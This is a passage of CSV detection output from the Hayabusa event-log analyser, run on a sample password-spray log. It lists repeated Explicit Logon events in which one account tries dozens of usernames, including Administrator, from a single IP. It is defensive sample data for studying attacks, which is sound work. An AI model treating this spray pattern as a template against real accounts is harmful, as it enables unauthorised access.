DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target 